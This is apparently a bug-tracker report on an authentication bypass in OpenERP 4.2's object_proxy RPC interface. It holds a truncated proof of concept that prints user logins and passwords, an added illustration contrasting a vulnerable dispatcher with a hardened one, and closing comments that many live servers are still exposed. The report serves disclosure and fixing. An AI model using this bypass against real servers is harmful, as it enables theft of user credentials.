[4.2] Netsvc object_proxy bypass
Affects | Status | Importance | Assigned to | Milestone
---|---|---|---|---
Odoo Server (MOVED TO GITHUB) | Invalid | Undecided | Unassigned |
4.2 | Fix Released | High | Stephane Wirtel (OpenERP) |
Bug Description
It's possible to call any method of the object xml-rpc interface using another interface called object_proxy. The only requisite is that the server is initialized (e.g. someone does the login or tries to log in).
This is solved in 5.0 but not in 4.2.
In bazaar, 4.2 is tagged as mature and I can't understand why this patch is not ported to this branch.
I attach a simple patch that we use in our production servers, some of which are still working on the 4.2 version.
Proof of concept:
sock = xmlrpclib.
ids = sock.execute(
f = sock.execute(
for u in f:
print ' user: %s pass: %s' % (u['login'], u['password'])
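The report describes a classic authorization-bypass pattern: the credential check lives in one RPC facade (`object`), while a second facade (`object_proxy`) reaches the same backend without it. The following is an added illustration written for this page, not OpenERP/Odoo code and not the reporter's patch; the class names, the `USERS` table and the `VALID_CREDS` store are constructed placeholders. It shows the vulnerable shape beside the hardened one, where the credential check is enforced in the shared dispatch layer so no facade can skip it.

```python
# Added illustration (not OpenERP/Odoo code, not the reporter's patch):
# an auth check that lives in one RPC facade is bypassed through a second
# facade that reaches the same backend; the fix moves the check into the
# dispatcher that every facade passes through. All names are hypothetical.


class AuthError(Exception):
    """Raised when a call does not carry valid credentials."""


# Constructed sample data standing in for a user table.
USERS = {1: {"login": "admin", "password": "s3cret"}}

# Constructed credential store: (db, uid, password) triples that are valid.
VALID_CREDS = {("demo", 1, "s3cret")}


def check_credentials(db, uid, passwd):
    """Compare via equality rather than set lookup so unhashable junk
    (e.g. a list in the password slot) fails closed instead of raising."""
    return any(cred == (db, uid, passwd) for cred in VALID_CREDS)


class ObjectService:
    """Backend that executes model methods; it trusts whoever calls it."""

    def execute(self, model, method, *args):
        if model == "res.users" and method == "read":
            return [USERS[i] for i in args[0]]
        raise ValueError("unknown call")


class VulnerableDispatcher:
    """Two entry points share one backend; only 'object' checks credentials."""

    def __init__(self):
        self.backend = ObjectService()

    def dispatch(self, service, method, params):
        if service == "object":
            if len(params) < 3:
                raise AuthError("credentials required")
            db, uid, passwd, *rest = params
            if not check_credentials(db, uid, passwd):
                raise AuthError("bad credentials")
            return getattr(self.backend, method)(*rest)
        if service == "object_proxy":
            # Second facade forwards straight to the backend: no check at all.
            return getattr(self.backend, method)(*params)
        raise ValueError("unknown service")


class HardenedDispatcher:
    """Credential check happens in the dispatcher, before any facade runs."""

    EXPOSED = {"object", "object_proxy"}

    def __init__(self):
        self.backend = ObjectService()

    def dispatch(self, service, method, params):
        if service not in self.EXPOSED:
            raise ValueError("unknown service")
        if len(params) < 3:
            raise AuthError("credentials required")
        db, uid, passwd, *rest = params
        if not check_credentials(db, uid, passwd):
            raise AuthError("bad credentials")
        return getattr(self.backend, method)(*rest)


def leaks_without_credentials(dispatcher):
    """True if the unauthenticated facade returns user records."""
    try:
        rows = dispatcher.dispatch("object_proxy", "execute",
                                   ["res.users", "read", [1]])
        return bool(rows)
    except (AuthError, ValueError):
        return False


if __name__ == "__main__":
    print("vulnerable leaks:", leaks_without_credentials(VulnerableDispatcher()))
    print("hardened leaks:  ", leaks_without_credentials(HardenedDispatcher()))
```

The point of the hardened version is structural: a new facade added later inherits the check automatically, because there is no code path from an exposed service name to the backend that does not pass through the credential test.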
Related branches
visibility: private → public
Changed in openobject-server:
status: Incomplete → Invalid
Changed in openobject-server:
importance: High → Undecided
Has anyone of the QT seen this bug??
There are a lot of working servers on the Internet that have this bug...
Attach one of the possible exploits?